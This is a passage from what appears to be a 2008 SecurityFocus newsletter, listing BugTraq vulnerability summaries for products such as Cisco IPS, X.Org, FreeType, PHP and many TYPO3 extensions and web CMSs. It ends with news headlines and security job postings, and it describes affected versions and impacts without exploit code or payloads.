43. Cisco Intrustion Prevention System (IPS) Platforms Inline Mode Denial of Service Vulnerability
BugTraq ID: 29791
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29791
Summary:
Cisco Intrustion Prevention System (IPS) platforms are prone to a denial-of-service vulnerability when handling jumbo Ethernet frames.

An attacker can exploit this issue to cause a kernel panic and deny service for legitimate users.

Versions prior to Cisco Intrustion Prevention System 5.1(8)E2 and 6.0(5)E2 are vulnerable.

NOTE: This issue affects only platforms that contain gigabit network interfaces and are deployed in inline mode.

44. Apple Mac OS X ImageIO BMP/GIF Image Information Disclosure Vulnerability
BugTraq ID: 29513
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29513
Summary:
Apple Mac OS X is prone to an information-disclosure vulnerability that occurs in ImageIO.

An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.

This issue affects Mac OS X 10.4.11, Mac OS X Server 10.4.11, Mac OS X 10.5 - 10.5.2, and Mac OS X Server 10.5 - 10.5.2.

NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability.

45. Microsoft Visual Basic Enterprise Edition 6 'vb6skit.dll' Remote Buffer Overflow Vulnerability
BugTraq ID: 29792
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29792
Summary:
Microsoft Visual Basic Enterprise Edition 6 is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate size checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.

Microsoft Visual Basic Enterprise Edition 6 SP6 is vulnerable; other versions may also be affected.

46. X.Org X Server RENDER Extension 'ProcRenderCreateCursor()' Denial of Service Vulnerability
BugTraq ID: 29665
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29665
Summary:
X.Org X Server is prone to a denial-of-service vulnerability because the software fails to properly handle exceptional conditions.

Attackers who can connect to a vulnerable X Server may exploit this issue to crash the targeted server, denying further service to legitimate users.

47. X.Org X Server MIT-SHM Extension Information Disclosure Vulnerability
BugTraq ID: 29669
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29669
Summary:
X.Org X Server is prone to an information-disclosure vulnerability that lets X clients read arbitrary X server memory.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

48. X.Org X server RENDER Extension Multiple Integer Overflow Vulnerabilities
BugTraq ID: 29670
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29670
Summary:
The RENDER component for X Server is prone to multiple integer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.

Successful exploits may allow attackers to execute arbitrary code with the privileges of a user running the software. Failed exploit attempts likely cause denial-of-service conditions.

49. Microsoft Windows Bluetooth Stack Remote Code Execution Vulnerability
BugTraq ID: 29522
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29522
Summary:
Microsoft Windows is prone to a remote code-execution vulnerability because its implementation of the Bluetooth stack fails to adequately handle a flood of specially crafted SDP (Service Discovery Protocol) requests.

To exploit this issue, an attacker must be within close physical proximity of the affected computer.

Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will completely compromise affected computers.

This issue affects only computers with Bluetooth capability.

50. UltraEdit FTP/SFTP 'LIST' Command Directory Traversal Vulnerability
BugTraq ID: 29784
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29784
Summary:
UltraEdit is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP/SFTP client.

Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.

UltraEdit 14.00b is vulnerable; other versions may also be affected.

51. Exero CMS 'theme' Parameter Multiple Local File Include Vulnerabilities
BugTraq ID: 29788
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29788
Summary:
Exero CMS is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.

Exero CMS 1.0.0 and 1.0.1 are vulnerable; other versions may also be affected.

52. ManageEngine OpUtils 'hostName' HTML Injection Vulnerability
BugTraq ID: 29785
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29785
Summary:
ManageEngine OpUtils is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

ManageEngine OpUtils 5 is vulnerable; previous versions may also be affected.

53. CRE Loaded Multiple HTML Injection Vulnerabilities
BugTraq ID: 29786
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29786
Summary:
CRE Loaded is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

CRE Loaded 6.2.13.1 and prior versions are vulnerable.

54. Traindepot Local File Include and Cross-Site Scripting Vulnerabilities
BugTraq ID: 29790
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29790
Summary:
Traindepot is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability.

An attacker could exploit the local file-include issue to obtain sensitive information. Exploits of the cross-site scripting issue may allow the attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Traindepot 0.1 is vulnerable; other versions may also be affected.

55. WebCalendar 'tools/send_reminders.php' Remote File Include Vulnerability
BugTraq ID: 29783
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29783
Summary:
WebCalendar is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

WebCalendar 1.0.4 is vulnerable; other versions may be affected as well.

56. EroCMS 'site' parameter SQL Injection Vulnerability
BugTraq ID: 29781
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29781
Summary:
EroCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

The issue affects EroCMS 1.4 and prior versions.

57. ClipShare 'group_posts.php' SQL Injection Vulnerability
BugTraq ID: 29779
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29779
Summary:
ClipShare is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to ClipShare 3.0.1 are vulnerable.

58. Adobe Flex 3 History Management 'historyFrame.html' Cross-Site Scripting Vulnerability
BugTraq ID: 29778
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29778
Summary:
Adobe Flex 3 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue affects Flex Builder 3, Flex SDK 3.0.1, and any applications built with Flex 3 that have enabled History Management.

59. MyShoutPro 'admin_access' Cookie Parameter Authentication Bypass Vulnerability
BugTraq ID: 29780
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29780
Summary:
MyShoutPro is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.

MyShoutPro 1.2 is vulnerable; other versions may also be affected.

60. easyTrade 'detail.php' SQL Injection Vulnerability
BugTraq ID: 29775
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29775
Summary:
easyTrade is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

61. PHP Site Lock 'index.php' SQL Injection Vulnerability
BugTraq ID: 29777
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29777
Summary:
PHP Site Lock is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Site Lock 2.0 is vulnerable; other versions may also be affected.

62. Foxy 'fs' Parameter Memory Exhaustion Remote Denial of Service Vulnerability
BugTraq ID: 29776
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29776
Summary:
Foxy is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.

Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause the application to freeze.

63. FreeCMS 'index.php' SQL Injection Vulnerability
BugTraq ID: 29773
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29773
Summary:
FreeCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

FreeCMS 0.2 is vulnerable; other versions may also be affected.

64. ThaiQuickCart 'PHPSESSID' Cookie Parameter Local File Include Vulnerability
BugTraq ID: 29774
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29774
Summary:
ThaiQuickCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue allows remote attackers to view local files within the context of the webserver process.

65. Basic-CMS 'index.php' SQL Injection Vulnerability
BugTraq ID: 29771
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29771
Summary:
Basic-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

66. Bizon-CMS 'photo/index.php' SQL Injection Vulnerability
BugTraq ID: 29770
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29770
Summary:
Bizon-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Bizon-CMS 2.0 is vulnerable; other versions may also be affected.

67. Comparison Engine Power 'product.detail.php' SQL Injection Vulnerability
BugTraq ID: 29768
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29768
Summary:
Comparison Engine Power is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Comparison Engine Power 1.0 is vulnerable; other versions may also be affected.

68. Jura Internet Connectivity Kit Unauthorized Access Input-Validation Vulnerability
BugTraq ID: 29767
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29767
Summary:
Jura Internet Connectivity Kit is prone to an input-validation vulnerability that can result in unauthorized access to a computer connected to an IMPRESSA F90 or F9 coffee maker.

Successful exploits allows attackers to access an affected computer will the privileges of the user running the application. Attackers can also modify coffee maker settings in a manner sufficient to disable devices to the point that repair is required.

69. Opera Web Browser 9.27 Multiple Security Vulnerabilities
BugTraq ID: 29684
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29684
Summary:
Opera Web Browser is prone to multiple security vulnerabilities.

Exploiting these issues can allow attackers to access cross-domain image information, carry out phishing attacks, and maliciously replace the contents of trusted frames on webpages.

Versions prior to Opera 9.5 are vulnerable.

70. LifeType 'index.php' SQL Injection Vulnerability
BugTraq ID: 29495
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29495
Summary:
LifeType is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

71. photokorn 'pic' Parameter SQL Injection Vulnerability
BugTraq ID: 27627
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/27627
Summary:
The photokorn gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects photokorn 1.543; other versions may also be vulnerable.

72. Multiple Vendor HTML Form Protocol Vulnerability
BugTraq ID: 3181
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/3181
Summary:
Malicious HTML forms can submit data to any port on an arbitrary machine. This opens the potential for remote command-execution attacks originating from an unsuspecting web user who submits the form. This attack may be initiated with JavaScript when a victim views a malicious page or HTML email.

To exploit this issue, an attacker must send the malicious form data unencoded to a server that uses an ASCII-based protocol. Possible targets include SMTP, NNTP, POP3, IMAP, and IRC. Remote commands may be passed to a pertinent service by including them as form content.

This issue may allow the attacker to take advantage of a trust relationship that exists between the victim and a third party (e.g. if both the victim and the third party are located behind a firewall).

Some servers may return user-supplied data, often as part of an error message. If the user-supplied data includes JavaScript, it will be executed in the context of the server. This is a type of cross-site scripting attack and may result in the disclosure of sensitive information such as cookie data.

This issue is known to be a problem with browsers and HTML-enabled email clients, but some server implementations and proxies will accept data sent in this manner.

NOTE: An attacker may be able to circumvent browsers that prevent access to certain ports by adding 65536 to the number of the port that the attacker is sending data to.

73. OpenBSD GNU Screen Locked Authentication Bypass Vulnerability
BugTraq ID: 29810
Remote: No
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29810
Summary:
GNU Screen for OpenBSD is prone to a vulnerability that allows local attackers to bypass the locked screen password prompt.

An attacker with local physical access to the console can exploit this issue to bypass the password prompt and gain access to the locked screen session.

The issue affects GNU Screen 4.0.3 for OpenBSD 4.3; other versions may also be vulnerable.

74. Photokorn Multiple SQL Injection Vulnerabilities
BugTraq ID: 17683
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/17683
Summary:
Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

75. FreeType TrueType Font 'SHC' Heap Buffer Overflow Vulnerability
BugTraq ID: 29639
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29639
Summary:
FreeType is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary within the context of the application using the FreeType library. Failed exploit attempts will result in a denial-of-service vulnerability.

NOTE: This issue may allow a local attacker using X.Org X server to gain elevated privileges on the affected computer.

FreeType 2.3.5 is vulnerable; other versions may also be affected.

76. FreeType2 Printer Font Binary Private Dictionary Table Integer Overflow Vulnerability
BugTraq ID: 29640
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29640
Summary:
FreeType2 is prone to an integer-overflow vulnerability because it fails to perform adequate checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code within the context of applications using the FreeType2 library. Failed exploit attempts will result in a denial-of-service condition.

NOTE: This issue can allow a local attacker using X.Org Xserver to gain elevated privileges on the affected computer.

FreeType2 2.3.5 is vulnerable; other versions may also be affected.

77. FreeType2 Printer Font Binary Remote Code Exeuction Vulnerability
BugTraq ID: 29641
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29641
Summary:
FreeType2 is prone to a remote code-execution vulnerability because of an error when freeing memory.

An attacker can exploit this issue to execute arbitrary within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability.

NOTE: This issue may allow a local attacker using X.Org X server to gain elevated privileges on an affected computer.

FreeType2 2.3.5 is vulnerable; other versions may also be affected.

78. Debian OpenSSL Package Random Number Generator Weakness
BugTraq ID: 29179
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29179
Summary:
The Debian OpenSSL package is prone to a random-number-generator weakness.

Attackers can exploit this issue to predict random data used to generate encryption keys by certain applications. This may help attackers compromise encryption keys and gain access to sensitive data.

This issue affects only a modified OpenSSL package for Debian prior to version 0.9.8c-4etch3.

79. BlognPlus Unspecified SQL Injection Vulnerability
BugTraq ID: 29764
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29764
Summary:
BlognPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects BlognPlus 2.5.4 and prior versions for MySQL and PostgreSQL editions.

80. AJ Auction 'id' Parameter SQL Injection Vulnerability
BugTraq ID: 29840
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29840
Summary:
AJ Auction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AJ Auction 1.0 is vulnerable; other versions may also be affected.

81. AJ Auction Pro 'cate_id' Parameter SQL Injection Vulnerability
BugTraq ID: 29839
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29839
Summary:
AJ Auction Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AJ Auction Pro, web 2.0 is vulnerable; other versions may also be affected.

82. Lotus Core CMS 'phpbb_root_path' Parameter Multiple Remote File Include Vulnerabilities
BugTraq ID: 29838
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29838
Summary:
Lotus Core CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Lotus Core CMS 1.0.1 is vulnerable; other versions may also be affected.

83. TYPO3 Frontend Filemanager Extension Unspecified Code Execution Vulnerability
BugTraq ID: 29837
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29837
Summary:
TYPO3 Frontend Filemanager extension is prone to an unspecified code-execution vulnerability.

Successful exploits allow attackers to execute arbitrary code in the context of the web server hosting the vulnerable application. This facilitates the remote compromise of affected computers.

Frontend Filemanager versions prior to 0.6.2 are vulnerable to this issue.

84. Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow Vulnerability
BugTraq ID: 29836
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29836
Summary:
Apple Safari WebKit is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks when handling user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

85. CaupoShop 'csc_article_details.php' SQL Injection Vulnerability
BugTraq ID: 29834
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29834
Summary:
CaupoShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CaupoShop Classic 1.3 is vulnerable; other versions may also be affected.

86. TYPO3 nepa-design.de Spam Protection Extension Unspecified Setting Manipulation Vulnerability
BugTraq ID: 29833
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29833
Summary:
TYPO3 nepa-design.de Spam Protection extension is prone to a vulnerability that results in the manipulation of external settings.

Attackers can leverage the issue to make unauthorized changes that may aid in further attacks.

nepa-design.de Spam Protection 0.1.3 is vulnerable; prior versions may also be affected.

87. TYPO3 Resource Library Extension Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29832
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29832
Summary:
The Resource Library extension for TYPO3 is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

Resource Library 0.10 is vulnerable; prior versions may also be affected.

88. MindTouch DekiWiki Search Cross-Site Scripting Vulnerability
BugTraq ID: 29830
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29830
Summary:
DekiWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

Versions prior to 8.05.1 are vulnerable.

89. PHP 'rfc822_write_address()' Function Buffer Overflow Vulnerability
BugTraq ID: 29829
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29829
Summary:
PHP is prone to a buffer-overflow vulnerability because the application fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users.

PHP versions 5.2.6 and prior are vulnerable.

90. TYPO3 JobControl Extension Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29828
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29828
Summary:
The JobControl extension for TYPO3 is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

JobControl versions prior to 1.15.1 are vulnerable.

91. TYPO3 Random Prayer Extension SQL Injection Vulnerability
BugTraq ID: 29827
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29827
Summary:
TYPO3 Random Prayer extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Random Prayer 0.0.1 is vulnerable.

92. TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified Input Validation Vulnerabilities
BugTraq ID: 29826
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29826
Summary:
The TARGET-E WorldCup Bets extension for TYPO3 is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TARGET-E WorldCup Bets extension 2.0.0 is vulnerable; other versions may also be affected.

93. TYPO3 Download system Extension SQL Injection Vulnerability
BugTraq ID: 29825
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29825
Summary:
TYPO3 Download system extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Download system 0.1.4 is vulnerable; prior versions may also be affected.

94. TYPO3 Fussballtippspiel Extension SQL Injection Vulnerability
BugTraq ID: 29824
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29824
Summary:
TYPO3 Fussballtippspiel extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Fussballtippspiel 0.1.1 and prior are vulnerable.

95. TYPO3 TIMTAB Social Bookmark Icons Extension SQL Injection Vulnerability
BugTraq ID: 29823
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29823
Summary:
TYPO3 TIMTAB - social bookmark icons extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 TIMTAB - social bookmark icons 2.0.4 and prior are vulnerable.

96. TYPO3 Diocese of Portsmouth Training Courses Extension SQL Injection Vulnerability
BugTraq ID: 29822
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29822
Summary:
TYPO3 Diocese of Portsmouth Training Courses extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Diocese of Portsmouth Training Courses 0.1.1 is vulnerable; other versions may also be affected.

97. TYPO3 CoolURI Extension SQL Injection Vulnerability
BugTraq ID: 29821
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29821
Summary:
TYPO3 CoolURI extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 CoolURI 1.0.11 and prior are vulnerable.

98. TYPO3 Diocese of Portsmouth Calendar Today Extension SQL Injection Vulnerability
BugTraq ID: 29819
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29819
Summary:
TYPO3 Diocese of Portsmouth Calendar Today extension is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TYPO3 Diocese of Portsmouth Calendar Today 0.0.3 and prior are vulnerable.

99. OwnRS 'clanek.php' Multiple Input Validation Vulnerabilities
BugTraq ID: 29818
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29818
Summary:
OwnRS CMS is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.

OwnRS beta 3 is vulnerable; other versions may also be affected.

100. vBulletin Moderation Control Panel 'redirect' Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 29817
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29817
Summary:
vBulletin is prone to a cross-site scripting vulnerability that occurs in the MCP (moderation control panel) because the application fails to properly sanitize user-supplied input.

vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected.

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Ransomware resisting crypto cracking efforts
By: Robert Lemos
Kaspersky calls for a massive effort to break the code keys used by a malicious program that encrypts its victim's data and asks for ransom, but other experts doubt the keys can be found or that finding them will help.
http://www.securityfocus.com/news/11523

2. Boycott spotlights antivirus testing issues
By: Robert Lemos
Security firm Trend Micro refuses to apply for future VB100 certifications, highlighting a debate over how to best test antivirus software.
http://www.securityfocus.com/news/11522

3. Hired gun blamed for business outage
By: Robert Lemos
Video-content firm Revision3 accuses anti-piracy company MediaDefender -- known for its aggressive tactics against file sharers -- of attacking its servers over the weekend.
http://www.securityfocus.com/news/11521

4. Legal experts wary of MySpace hacking charges
By: Robert Lemos
Federal prosecutors charge the parent who allegedly badgered a girl to suicide with three counts of computer crime, but law experts worry about a dangerous precedent.
http://www.securityfocus.com/news/11519

IV. SECURITY JOBS LIST SUMMARY
-------------------------------
1. [SJ-JOB] Director, Computer Security, Fort Lauderdale
http://www.securityfocus.com/archive/77/493408

2. [SJ-JOB] Certification & Accreditation Engineer, Laurel
http://www.securityfocus.com/archive/77/493413

3. [SJ-JOB] Sr. Security Analyst, Washington
http://www.securityfocus.com/archive/77/493414

4. [SJ-JOB] Sr. Security Engineer, Jersey City
http://www.securityfocus.com/archive/77/493415

5. [SJ-JOB] Sr. Security Engineer, San Jose
http://www.securityfocus.com/archive/77/493416

6. [SJ-JOB] Security Consultant, Columbus/Cincinnati/Indianapolis
http://www.securityfocus.com/archive/77/493411

7. [SJ-JOB] Sales Engineer, Bangalore, New Delhi and Hyderabad
http://www.securityfocus.com/archive/77/493417

8. [SJ-JOB] Security Architect, Chicago
http://www.securityfocus.com/archive/77/493418

9. [SJ-JOB] Security Engineer, Herndon
http://www.securityfocus.com/archive/77/493419

10. [SJ-JOB] Security System Administrator, Washington
http://www.securityfocus.com/archive/77/493420

11. [SJ-JOB] Penetration Engineer, San Francisco
http://www.securityfocus.com/archive/77/493402

12. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
http://www.securityfocus.com/archive/77/493406

13. [SJ-JOB] Application Security Engineer, Chicago
http://www.securityfocus.com/archive/77/493410

14. [SJ-JOB] Sr. Product Manager, Boston
http://www.securityfocus.com/archive/77/493401

15. [SJ-JOB] Security Consultant, Atlanta
http://www.securityfocus.com/archive/77/493404

16. [SJ-JOB] Security Engineer, Atlanta
http://www.securityfocus.com/archive/77/493407

17. [SJ-JOB] Developer, Arlington
http://www.securityfocus.com/archive/77/493409

18. [SJ-JOB] Technical Writer, Alpharetta
http://www.securityfocus.com/archive/77/493412

19. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
http://www.securityfocus.com/archive/77/493398

20. [SJ-JOB] Security Consultant, Atlanta
http://www.securityfocus.com/archive/77/493399

21. [SJ-JOB] Sr. Product Manager, Atlanta
http://www.securityfocus.com/archive/77/493400

